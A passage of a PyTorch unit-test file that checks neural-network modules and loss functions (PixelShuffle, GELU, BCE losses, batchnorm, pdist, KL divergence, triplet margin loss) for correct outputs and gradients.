@repeat_test_for_types(get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
def test_noncontig_conv_grad_cuda(self, dtype=torch.float):
# FIXME: remove after adding non-contiguous grad tests for all modules
module = nn.Conv2d(3, 5, kernel_size=3, padding=1).to("cuda", dtype)
input = torch.randn(2, 3, 10, 10, dtype=dtype, device="cuda", requires_grad=True)
output = module(input)
grad = torch.randn(2, 2, 5, 10, 10, dtype=dtype, device="cuda")[:, 1]
assert not grad.is_contiguous()
output.backward(grad, retain_graph=True)
self.assertIsNotNone(input.grad)
result = input.grad.data.clone()
input.grad.data.zero_()
output.backward(grad.contiguous())
self.assertEqual(result, input.grad.data, atol=dtype2prec_DONTUSE[dtype], rtol=0)
def test_pixel_shuffle_unshuffle(self):
def _test_pixel_shuffle_unshuffle_helper(num_input_dims, valid_channels_dim=True,
upscale_factor=None):
# Function to imperatively ensure pixels are shuffled to the correct locations.
# Used to validate the batch operations in pixel_shuffle.
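# For upscale factor r, the expected mapping is
# output[..., c, h, w] == input[..., c * r**2 + r * (h % r) + (w % r), h // r, w // r],
# which is exactly what the loop below verifies element by element.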
def _verify_pixel_shuffle(input, output, upscale_factor):
for c in range(output.size(-3)):
for h in range(output.size(-2)):
for w in range(output.size(-1)):
height_idx = h // upscale_factor
width_idx = w // upscale_factor
channel_idx = (upscale_factor * (h % upscale_factor)) + (w % upscale_factor) + \
(c * upscale_factor ** 2)
self.assertEqual(output[..., c, h, w], input[..., channel_idx, height_idx, width_idx])
upscale_factor = random.randint(2, 5) if upscale_factor is None else upscale_factor
# If valid_channels_dim=False, add 1 to make channels dim indivisible by upscale_factor ** 2.
channels = random.randint(1, 4) * upscale_factor ** 2 + (0 if valid_channels_dim else 1)
height = random.randint(5, 10)
width = random.randint(5, 10)
if num_input_dims == 1:
input = torch.rand(channels, requires_grad=True)
elif num_input_dims == 2:
input = torch.rand(height, width, requires_grad=True)
else:
batch_sizes = [random.randint(1, 3) for _ in range(num_input_dims - 3)]
input = torch.rand(*batch_sizes, channels, height, width, requires_grad=True)
ps = nn.PixelShuffle(upscale_factor)
pus = nn.PixelUnshuffle(downscale_factor=upscale_factor)
if num_input_dims >= 3 and valid_channels_dim and upscale_factor > 0:
output = ps(input)
_verify_pixel_shuffle(input, output, upscale_factor)
output.backward(output.data)
self.assertEqual(input.data, input.grad.data)
# Ensure unshuffle properly inverts shuffle.
unshuffle_output = pus(output)
self.assertEqual(input, unshuffle_output)
else:
self.assertRaises(RuntimeError, lambda: ps(input))
def _test_pixel_unshuffle_error_case_helper(num_input_dims, valid_height_dim=True, valid_width_dim=True,
downscale_factor=None):
downscale_factor = random.randint(2, 5) if downscale_factor is None else downscale_factor
channels = random.randint(1, 4)
# If valid_height_dim=False, add 1 to make height dim indivisible by downscale_factor.
height = random.randint(3, 5) * abs(downscale_factor) + (0 if valid_height_dim else 1)
# If valid_width_dim=False, add 1 to make width dim indivisible by downscale_factor.
width = random.randint(3, 5) * abs(downscale_factor) + (0 if valid_width_dim else 1)
if num_input_dims == 1:
input = torch.rand(channels, requires_grad=True)
elif num_input_dims == 2:
input = torch.rand(height, width, requires_grad=True)
else:
batch_sizes = [random.randint(1, 3) for _ in range(num_input_dims - 3)]
input = torch.rand(*batch_sizes, channels, height, width, requires_grad=True)
pus = nn.PixelUnshuffle(downscale_factor)
self.assertRaises(RuntimeError, lambda: pus(input))
def _test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims):
# For 1D - 2D, this is an error case.
# For 3D - 5D, this is a success case for pixel_shuffle + pixel_unshuffle.
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims)
# Error cases for pixel_shuffle.
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims, valid_channels_dim=False)
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims, upscale_factor=0)
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims, upscale_factor=-2)
# Error cases for pixel_unshuffle.
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, valid_height_dim=False)
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, valid_width_dim=False)
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, downscale_factor=0)
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, downscale_factor=-2)
def test_pixel_shuffle_unshuffle_1D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=1)
def test_pixel_shuffle_unshuffle_2D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=2)
def test_pixel_shuffle_unshuffle_3D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=3)
def test_pixel_shuffle_unshuffle_4D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=4)
def test_pixel_shuffle_unshuffle_5D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=5)
test_pixel_shuffle_unshuffle_1D()
test_pixel_shuffle_unshuffle_2D()
test_pixel_shuffle_unshuffle_3D()
test_pixel_shuffle_unshuffle_4D()
test_pixel_shuffle_unshuffle_5D()
def test_elu_inplace_on_view(self):
v = torch.tensor([1.0, -1.0, 1.0, -1.0], requires_grad=True)
def func(root):
x = root.clone()
view = x.narrow(0, 1, 2)
res = F.elu(view, inplace=True)
self.assertIs(res, view)
return x
gradcheck(func, [v])
gradgradcheck(func, [v])
def test_relu_inplace_on_view(self):
v = torch.tensor([1.0, -1.0, 1.0, -1.0], requires_grad=True)
def func(root):
x = root.clone()
view = x.narrow(0, 1, 2)
res = F.relu(view, inplace=True)
self.assertIs(res, view)
return x
gradcheck(func, [v])
gradgradcheck(func, [v])
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_PReLU_backward_requires_grad_false(self):
m = nn.PReLU().to('cuda')
x = torch.randn(2, 3, 4, 5, requires_grad=False, device='cuda')
y = m(x)
y.mean().backward()
self.assertEqual(x.grad, None)
@unittest.skipIf(
not TEST_NUMPY or not TEST_SCIPY, "Numpy or Scipy not found")
def test_gelu(self):
def _test_gelu(n, m, dtype, contiguous, atol=None, rtol=None):
numpy_dtype = {
torch.bfloat16: torch.float, torch.float: torch.float, torch.double: torch.double
}[dtype]
devices = ['cpu']
devices += ['cuda'] if TEST_CUDA else []
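# Reference implementation: GELU(x) = x * Phi(x), where Phi is the standard
# normal CDF (taken here from scipy.stats).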
def _gelu_ref(X):
return X * stats.norm.cdf(X)
for d in devices:
if contiguous:
X = torch.rand(n, m, dtype=dtype, requires_grad=True, device=d)
else:
X = torch.rand(n, m, dtype=dtype, requires_grad=True, device=d)[:, ::2]
res = F.gelu(X)
ref = _gelu_ref(X.to(numpy_dtype).cpu().detach().numpy())
self.assertEqual(res, ref, rtol=rtol, atol=atol, exact_dtype=False)
if dtype == torch.float64:
gradcheck(F.gelu, [X], eps=1e-4)
for n in range(1, 10):
for m in range(1, 10):
_test_gelu(n, m, torch.bfloat16, True, 1e-2, 0)
_test_gelu(n, m, torch.bfloat16, False, 1e-2, 0)
_test_gelu(n, m, torch.float32, True)
_test_gelu(n, m, torch.float32, False)
_test_gelu(n, m, torch.float64, True)
_test_gelu(n, m, torch.float64, False)
# Test multi threaded
num_threads = torch.get_num_threads()
torch.set_num_threads(4)
try:
_test_gelu(32, 32, torch.float32, False)
finally:
torch.set_num_threads(num_threads)
def test_bce_loss_always_nonnegative(self):
target = torch.ones(5)
input = torch.ones(5)
self.assertEqual((nn.BCELoss()(input, target) < 0).sum(), 0)
target = torch.zeros(5)
input = torch.zeros(5)
self.assertEqual((nn.BCELoss()(input, target) < 0).sum(), 0)
def test_bce_with_logits_raises_if_target_and_input_are_different_size(self):
target = torch.rand(5)
input = torch.rand(5, 1)
with self.assertRaises(ValueError):
nn.BCEWithLogitsLoss()(input, target)
target = torch.rand(5, 1)
input = torch.rand(5)
with self.assertRaises(ValueError):
nn.BCEWithLogitsLoss()(input, target)
def test_bce_with_logits_gives_same_result_as_sigmoid_and_bce_loss(self):
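# BCEWithLogitsLoss should be numerically equivalent to applying Sigmoid
# followed by BCELoss, including with weights and with extreme logits.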
sigmoid = nn.Sigmoid()
target = torch.rand(64, 4)
output = torch.rand(64, 4) - 0.5
self.assertEqual(nn.BCEWithLogitsLoss()(output, target), nn.BCELoss()(sigmoid(output), target))
weight = torch.rand(4)
self.assertEqual(nn.BCEWithLogitsLoss(weight)(output, target), nn.BCELoss(weight)(sigmoid(output), target))
target = torch.zeros(4, 1, dtype=torch.float)
output = torch.empty(4, 1, dtype=torch.float).fill_(-100)
self.assertEqual(nn.BCEWithLogitsLoss()(output, target), nn.BCELoss()(sigmoid(output), target))
self.assertEqual(nn.BCEWithLogitsLoss(reduction='none')(output, target),
nn.BCELoss(reduction='none')(sigmoid(output), target))
weight = torch.rand(1, dtype=torch.float)
self.assertEqual(nn.BCEWithLogitsLoss(weight)(output, target), nn.BCELoss(weight)(sigmoid(output), target))
def test_bce_loss_input_range(self):
bceloss = nn.BCELoss()
target = torch.rand(25, 25)
output_valid = torch.rand(25, 25)
output_too_negative = output_valid - 1.0
output_too_positive = output_valid + 1.0
loss_valid = bceloss(output_valid, target)
with self.assertRaisesRegex(RuntimeError, 'between 0 and 1'):
bceloss(output_too_negative, target)
with self.assertRaisesRegex(RuntimeError, 'between 0 and 1'):
bceloss(output_too_positive, target)
def test_bce_loss_size_mismatch(self):
bceloss = nn.BCELoss()
a = torch.rand(25)
b = torch.rand(25, 1)
with self.assertRaisesRegex(ValueError, r'Using a target size \('):
bceloss(a, b)
def test_bce_with_logits_gives_same_result_as_sigmoid_and_bce_loss_large_tensors_with_grad(self):
x_size = 1024
y_size = 256
target = torch.rand(x_size, y_size)
for reduction in ['none', 'mean', 'sum']:
output_sig = torch.rand(x_size, y_size) - 0.5
output_logits = output_sig.clone().detach()
output_sig.requires_grad = True
output_logits.requires_grad = True
weight = torch.rand(y_size)
loss_sig = nn.BCELoss(weight, reduction=reduction)(
torch.sigmoid(output_sig), target
)
loss_logits = nn.BCEWithLogitsLoss(weight, reduction=reduction)(
output_logits, target
)
self.assertEqual(loss_logits, loss_sig)
if reduction == 'none':
grad = torch.rand(x_size, y_size)
loss_sig.backward(grad)
loss_logits.backward(grad)
else:
loss_sig.backward()
loss_logits.backward()
self.assertEqual(output_sig.grad, output_logits.grad)
def test_bce_with_logits_has_correct_grad_at_zero(self):
output = torch.zeros(3, 1, requires_grad=True)
target = torch.zeros(3, 1)
nn.BCEWithLogitsLoss(reduction='sum')(output, target).backward()
expected_grad = torch.empty(3, 1).fill_(0.5)
self.assertEqual(output.grad, expected_grad)
def test_bce_with_logits_broadcasts_weights(self):
target = torch.rand(16, 4)
output = torch.rand(16, 4) - 0.5
weight = torch.rand(4)
out1 = nn.BCEWithLogitsLoss(weight)(output, target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCEWithLogitsLoss(weight)(output, target)
self.assertEqual(out1, out2)
weight = torch.rand(16, 1)
out1 = nn.BCEWithLogitsLoss(weight)(output, target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCEWithLogitsLoss(weight)(output, target)
self.assertEqual(out1, out2)
def test_bce_with_logits_ones_in_pos_weights_are_the_same_as_none(self):
target = torch.rand(64, 4)
output = torch.rand(64, 4) - 0.5
pos_weight = torch.ones(64, 4)
self.assertEqual(nn.BCEWithLogitsLoss()(output, target),
nn.BCEWithLogitsLoss(pos_weight=pos_weight)(output, target))
def test_bce_with_logits_broadcasts_pos_weights(self):
target = torch.rand(64, 4)
output = torch.rand(64, 4) - 0.5
pos_weight = torch.rand(4)
out1 = nn.BCEWithLogitsLoss(pos_weight=pos_weight)(output, target)
pos_weight1 = pos_weight.expand(1, 4)
out2 = nn.BCEWithLogitsLoss(pos_weight=pos_weight1)(output, target)
pos_weight2 = pos_weight.expand(64, 4)
out3 = nn.BCEWithLogitsLoss(pos_weight=pos_weight2)(output, target)
self.assertEqual(out1, out2)
self.assertEqual(out1, out3)
def test_bce_with_logits_with_pos_weight_has_correct_grad_at_zero(self):
output = torch.zeros(3, 1, requires_grad=True)
target = torch.zeros(3, 1)
pos_weight = torch.ones(3, 1)
nn.BCEWithLogitsLoss(pos_weight=pos_weight, reduction='sum')(output, target).backward()
expected_grad = torch.empty(3, 1).fill_(0.5)
grad = output.grad
self.assertEqual(grad, expected_grad)
def test_bce_with_logits_stability(self):
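# With a very negative logit (-120), a naive sigmoid followed by log would
# underflow to log(0); the fused loss must remain finite, with and without
# pos_weight.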
output = torch.tensor([0., -120.])
target = torch.tensor([0., 1.])
pos_weight = torch.tensor([1., 1.])
out1 = nn.BCEWithLogitsLoss()(output, target)
self.assertTrue(torch.isfinite(out1).all().item())
out2 = nn.BCEWithLogitsLoss(pos_weight=pos_weight)(output, target)
self.assertTrue(torch.isfinite(out2).all().item())
def test_bce_loss_broadcasts_weights(self):
sigmoid = nn.Sigmoid()
target = torch.rand(16, 4)
output = torch.rand(16, 4) - 0.5
weight = torch.rand(4)
out1 = nn.BCELoss(weight)(sigmoid(output), target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCELoss(weight)(sigmoid(output), target)
self.assertEqual(out1, out2)
weight = torch.rand(16, 1)
out1 = nn.BCELoss(weight)(sigmoid(output), target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCELoss(weight)(sigmoid(output), target)
self.assertEqual(out1, out2)
def test_elu_inplace_gradgrad(self):
v = torch.randn(8, requires_grad=True)
def func(root):
x = root.clone()
return F.elu(x, inplace=True)
gradcheck(func, [v])
gradgradcheck(func, [v])
def test_hardtanh_inplace_gradgrad(self):
v = torch.randn(8, requires_grad=True)
def func(root):
x = root.clone()
return F.hardtanh(x, inplace=True)
gradcheck(func, [v])
gradgradcheck(func, [v])
# test hardtanh backward for a large tensor
def test_hardtanh_backward(self):
x = torch.randn(128, 10000, requires_grad=True)
grad = torch.randn(128, 10000)
z = torch.zeros(128, 10000)
y = F.hardtanh(x)
y.backward(grad)
# ref backward path for hardtanh
mask = (x > -1) & (x < 1)
x_grad_ref = torch.where(mask, grad, z)
self.assertEqual(x.grad, x_grad_ref)
def test_batchnorm_nhwc_cpu(self):
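# Run BatchNorm2d on a channels_last (NHWC) input and compare outputs and
# gradients against an identically initialized module fed the contiguous
# (NCHW) equivalent.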
def helper(self, size):
channels = size[1]
input = torch.randn(size, dtype=torch.float32, device='cpu', requires_grad=True)
input = input.contiguous(memory_format=torch.channels_last)
input.retain_grad()
grad = torch.randn(size, dtype=torch.float32, device='cpu')
grad = grad.contiguous(memory_format=torch.channels_last)
bn = nn.BatchNorm2d(channels).cpu().float()
bn.weight.data.uniform_()
bn.bias.data.uniform_()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_bn = nn.BatchNorm2d(channels).cpu().float()
ref_bn.load_state_dict(bn.state_dict())
out = bn(input)
out.backward(grad)
ref_out = ref_bn(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(bn.weight.grad, ref_bn.weight.grad)
self.assertEqual(bn.bias.grad, ref_bn.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
helper(self, (4, 8, 10, 10))
helper(self, (4, 1, 9, 9))
helper(self, (4, 9, 1, 1))
def test_batchnorm_non_contig_cpu(self):
input = torch.arange(6, dtype=torch.float).reshape(1, 3, 2, 1).cpu()
input = input.permute(0, 2, 1, 3)
bn = torch.nn.BatchNorm2d(2).cpu().float().eval()
bn.weight.data.uniform_()
bn.bias.data.uniform_()
ref_input = input.detach().clone().contiguous()
ref_bn = nn.BatchNorm2d(2).cpu().float().eval()
ref_bn.load_state_dict(bn.state_dict())
out = bn(input)
ref_out = ref_bn(ref_input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
@skipIfRocm
def test_batchnorm_cudnn_nhwc(self):
def run_test(input, grad_output):
c = input.size(1)
mod = nn.BatchNorm2d(c).cuda().float()
mod.weight.data.uniform_()
mod.bias.data.uniform_()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad_output.detach().clone().contiguous()
ref_mod = nn.BatchNorm2d(c).cuda().float()
ref_mod.load_state_dict(mod.state_dict())
out = mod(input)
out.backward(grad_output)
ref_out = ref_mod(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(mod.weight.grad, ref_mod.weight.grad)
self.assertEqual(mod.bias.grad, ref_mod.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
input = torch.randint(1, 10, (4, 8, 2, 2), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).detach().requires_grad_()
grad = torch.randint(1, 10, (4, 8, 2, 2), dtype=torch.float32, device="cuda")
grad = grad.contiguous(memory_format=torch.channels_last)
run_test(input, grad)
# see #42588: grad is channels_last contiguous, but grad.suggest_memory_format (rightly) returns
# "contiguous", not channels_last
input = torch.randint(1, 10, (2, 8, 8, 1), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).detach().requires_grad_()
grad = torch.randint(1, 10, (2, 8, 8, 1), dtype=torch.float32, device="cuda")
grad = grad.permute(0, 2, 1, 3)
run_test(input, grad)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_batchnorm_cudnn_half(self):
# THNN
input = torch.randint(1, 10, (2, 3, 2, 2), dtype=torch.half, device="cuda", requires_grad=True)
m = nn.BatchNorm2d(3).half().cuda()
thnn_output = m(input)
thnn_output.sum().backward()
thnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(thnn_output, input)
# cuDNN
if TEST_CUDNN:
input.grad = None
m = m.float()
cudnn_output = m(input)
cudnn_output.sum().backward()
cudnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(cudnn_output, input)
self.assertEqual(cudnn_output, thnn_output)
self.assertEqual(cudnn_input_grad, thnn_input_grad, atol=1e-3, rtol=0)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_batchnorm_nonaffine_cuda_half_input(self):
input = torch.randn(16, 3, 24, 24, dtype=torch.half, device="cuda")
m = nn.BatchNorm2d(3, affine=False).cuda().float() # keep running stats in FP32
output = m(input)
self.assertEqualTypeString(output, input)
m.eval()
output = m(input)
self.assertEqualTypeString(output, input)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@repeat_test_for_types([torch.float, torch.half])
def test_batchnorm_large_batch(self, dtype=torch.float):
bn = nn.BatchNorm2d(1).to('cuda', dtype)
data = torch.rand(880801, 1, 1, 1, device="cuda", dtype=dtype)
bn(data).sum().backward()
def test_batchnorm_raises_error_if_less_than_one_value_per_channel(self):
x = torch.rand(10)[None, :, None]
with self.assertRaises(ValueError):
torch.nn.BatchNorm1d(10)(x)
def test_batchnorm_raises_error_if_running_mean_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_var = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, torch.rand(size), running_var)
def test_batchnorm_raises_error_if_running_var_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_mean = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, running_mean, torch.rand(size))
def test_batchnorm_raises_error_if_weight_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_mean = torch.rand(10)
running_var = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, running_mean, running_var, weight=Parameter(torch.rand(size)))
def test_batchnorm_raises_error_if_bias_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_mean = torch.rand(10)
running_var = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, running_mean, running_var, bias=Parameter(torch.rand(size)))
def test_batchnorm_buffer_update_when_stats_are_not_tracked(self):
input_size = (32, 4)
# Instantiate BN with buffers that are not None
bn = nn.BatchNorm1d(input_size[1], track_running_stats=True)
# Use buffers for normalization but don't update them
bn.track_running_stats = False
# Store initial values
num_batches = bn.num_batches_tracked.clone()
running_mean = bn.running_mean.clone()
running_var = bn.running_var.clone()
# Forward random tensor
_ = bn(torch.rand(input_size))
# Ensure none of the buffers has been updated
self.assertTrue(torch.equal(num_batches, bn.num_batches_tracked))
self.assertTrue(torch.equal(running_mean, bn.running_mean))
self.assertTrue(torch.equal(running_var, bn.running_var))
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_batchnorm_nhwc_cuda(self):
for dtype in (torch.half, torch.float):
(N, C, H, W) = 2, 64, 50, 50
model = torch.nn.BatchNorm2d(C, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
model = model.eval().cuda().to(dtype)
inp1 = torch.randn(N, C, H, W, device=torch.device('cuda'), dtype=dtype)
inp2 = inp1.contiguous(memory_format=torch.channels_last)
out1 = model(inp1)
out2 = model(inp2)
self.assertTrue(torch.equal(out1, out2))
def test_pairwise_distance(self):
input1 = torch.randn(4, 4, requires_grad=True)
input2 = torch.randn(4, 4, requires_grad=True)
self.assertTrue(gradcheck(lambda x, y: F.pairwise_distance(x, y), (input1, input2)))
def test_pdist(self):
for device, trans in itertools.product(device_(), [False, True]):
inp = torch.randn(4, 5, dtype=torch.double, device=device, requires_grad=True)
if trans:
inp = inp.transpose(0, 1)
for p in [0, 1, 2, 0.5, 1.5, 2.5, float('inf')]:
self.assertTrue(gradcheck(lambda x: F.pdist(x, p), (inp,)))
def test_pdist_zeros(self):
"""Test that grad is still valid when dist is 0"""
for device in device_():
inp = torch.randn(1, 3, dtype=torch.double, device=device, requires_grad=True).repeat([2, 1])
for p in [0, 1, 2, 0.5, 1.5, 2.5, float('inf')]:
self.assertTrue(gradcheck(lambda x: F.pdist(x, p), (inp,)))
def test_pdist_empty_row(self):
for device in device_():
inp = torch.randn(1, 3, dtype=torch.double, device=device, requires_grad=True)
self.assertTrue(gradcheck(F.pdist, (inp,)))
def test_pdist_empty_col(self):
for device in device_():
inp = torch.randn(4, 0, dtype=torch.double, device=device, requires_grad=True)
self.assertTrue(gradcheck(F.pdist, (inp,)))
@unittest.expectedFailure
def test_pdist_cpu_gradgrad_unimplemented(self):
inp = torch.randn(4, 5, requires_grad=True)
gradgradcheck(F.pdist, (inp,))
@unittest.expectedFailure
def test_pdist_cuda_gradgrad_unimplemented(self):
inp = torch.randn(4, 5, device='cuda', requires_grad=True)
gradgradcheck(F.pdist, (inp,))
def test_binary_cross_entropy_grads(self):
for device in device_():
input = torch.rand(3, 3, dtype=torch.double, device=device, requires_grad=True)
target = torch.rand(3, 3, dtype=torch.double, device=device)
gradcheck(F.binary_cross_entropy, [input, target])
gradgradcheck(F.binary_cross_entropy, [input, target])
# now with differentiable target
target.requires_grad_(True)
gradcheck(F.binary_cross_entropy, [input, target], check_batched_grad=False)
# no double backward for target yet
with self.assertRaisesRegex(RuntimeError, "not implemented"):
gradgradcheck(F.binary_cross_entropy, [input, target], check_batched_grad=False)
def test_cosine_embedding_loss_with_diff_type(self):
for device in device_():
input1 = torch.tensor([[2, 3, 4], [6, 2, 4]], dtype=torch.double, device=device)
input2 = torch.tensor([[2, 3, 5], [3, 2, 1]], dtype=torch.double, device=device)
target = torch.tensor([1, -1], dtype=torch.int, device=device)
expected = torch.nn.functional.cosine_embedding_loss(input1, input2, target)
for dt1 in get_all_math_dtypes(device):
for dt2 in get_all_math_dtypes(device):
for dt3 in get_all_math_dtypes(device):
# dt3 is used as dtype for target = [1, -1], so let's skip unsigned type
if dt3 == torch.uint8:
continue
if dt1.is_complex or dt2.is_complex or dt3.is_complex:
continue
input1 = input1.to(dt1)
input2 = input2.to(dt2)
target = target.to(dt3)
result = torch.nn.functional.cosine_embedding_loss(input1, input2, target)
self.assertEqual(result.item(), expected.item(), atol=0.001, rtol=0)
def test_kl_div_with_diff_type(self):
for device in device_():
input = torch.tensor([[2, 3, 5], [3, 2, 1]], dtype=torch.double, device=device)
target = torch.tensor([[1, 2, 3], [4, 5, 6]], dtype=torch.double, device=device)
expected = torch.nn.functional.kl_div(input, target)
for input_dtype in get_all_math_dtypes(device):
if input_dtype.is_complex:
continue
for target_dtype in [torch.float32, torch.float64, torch.float16]:
if (torch.device(device).type == 'cpu' and target_dtype == torch.float16):
continue
input = input.to(input_dtype)
target = target.to(target_dtype)
result = torch.nn.functional.kl_div(input, target)
self.assertEqual(result.item(), expected.item(), atol=0.001, rtol=0)
def test_kl_div_with_diff_type_log_target(self):
for device in device_():
input = torch.tensor([[2, 3, 5], [3, 2, 1]], dtype=torch.double, device=device)
target = torch.tensor([[1, 2, 3], [4, 5, 6]], dtype=torch.double, device=device).log()
expected = torch.nn.functional.kl_div(input, target, log_target=True)
for input_dtype in get_all_math_dtypes(device):
if input_dtype.is_complex:
continue
for target_dtype in [torch.float32, torch.float64, torch.float16]:
if (torch.device(device).type == 'cpu' and target_dtype == torch.float16):
continue
input = input.to(input_dtype)
target = target.to(target_dtype)
result = torch.nn.functional.kl_div(input, target, log_target=True)
self.assertEqual(result.item(), expected.item(), atol=0.001, rtol=0)
def test_kl_div_log_softmax_target(self):
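# The KL divergence of a distribution with itself is zero; with
# log_target=True both arguments are log-probabilities, so identical inputs
# must give an all-zero 'none'-reduced result.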
for device in device_():
a = torch.tensor([[1.0, 2, 3], [5.0, 5, 5]], device=device)
b = torch.tensor([[1.0, 2, 3], [5.0, 5, 5]], device=device)
self.assertEqual(
F.kl_div(F.log_softmax(a, 1), F.log_softmax(b, 1), reduction='none', log_target=True),
torch.zeros_like(a)
)
def test_cosine_embedding_loss_no_reduce(self):
input1 = torch.randn(15, 10, requires_grad=True)
input2 = torch.randn(15, 10, requires_grad=True)
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.cosine_embedding_loss(
x, y, z, reduction='none'), (input1, input2, target)))
self.assertEqual(F.cosine_embedding_loss(input1, input2, target, reduction='none'),
loss_reference_fns['CosineEmbeddingLoss'](input1, input2, target, reduction='none'))
def test_cosine_embedding_loss_margin_no_reduce(self):
input1 = torch.randn(15, 10, requires_grad=True)
input2 = torch.randn(15, 10, requires_grad=True)
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.cosine_embedding_loss(
x, y, z, margin=0.5, reduction='none'), (input1, input2, target)))
self.assertEqual(F.cosine_embedding_loss(input1, input2, target, margin=0.5, reduction='none'),
loss_reference_fns['CosineEmbeddingLoss'](input1, input2, target,
margin=0.5, reduction='none'))
def test_cosine_embedding_loss_invalid_target_shape(self):
input1 = torch.randn(15, 10)
input2 = torch.randn(15, 10)
target = torch.randn(15, 1).sign()
with self.assertRaisesRegex(RuntimeError, "1D target tensor expected"):
F.cosine_embedding_loss(input1, input2, target)
def test_margin_ranking_loss_no_reduce(self):
input1 = torch.randn(15).mul_(10).requires_grad_()
input2 = torch.randn(15).mul_(10).requires_grad_()
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.margin_ranking_loss(
x, y, z, reduction='none'), (input1, input2, target)))
self.assertEqual(F.margin_ranking_loss(input1, input2, target, reduction='none'),
loss_reference_fns['MarginRankingLoss'](input1, input2, target, reduction='none'))
def test_margin_ranking_loss_margin_no_reduce(self):
input1 = torch.randn(15).mul_(10).requires_grad_()
input2 = torch.randn(15).mul_(10).requires_grad_()
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.margin_ranking_loss(
x, y, z, margin=0.5, reduction='none'), (input1, input2, target)))
self.assertEqual(F.margin_ranking_loss(input1, input2, target, margin=0.5, reduction='none'),
loss_reference_fns['MarginRankingLoss'](input1, input2, target, margin=0.5, reduction='none'))
def test_triplet_margin_loss(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
x1, x2, x3), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3))
def test_triplet_margin_loss_swap(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
x1, x2, x3, swap=True), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3, swap=True),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3, swap=True))
def test_triplet_margin_loss_no_reduce(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
x1, x2, x3, reduction='none'), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3, reduction='none'),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3, reduction='none'))
def test_triplet_margin_loss_swap_no_reduce(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
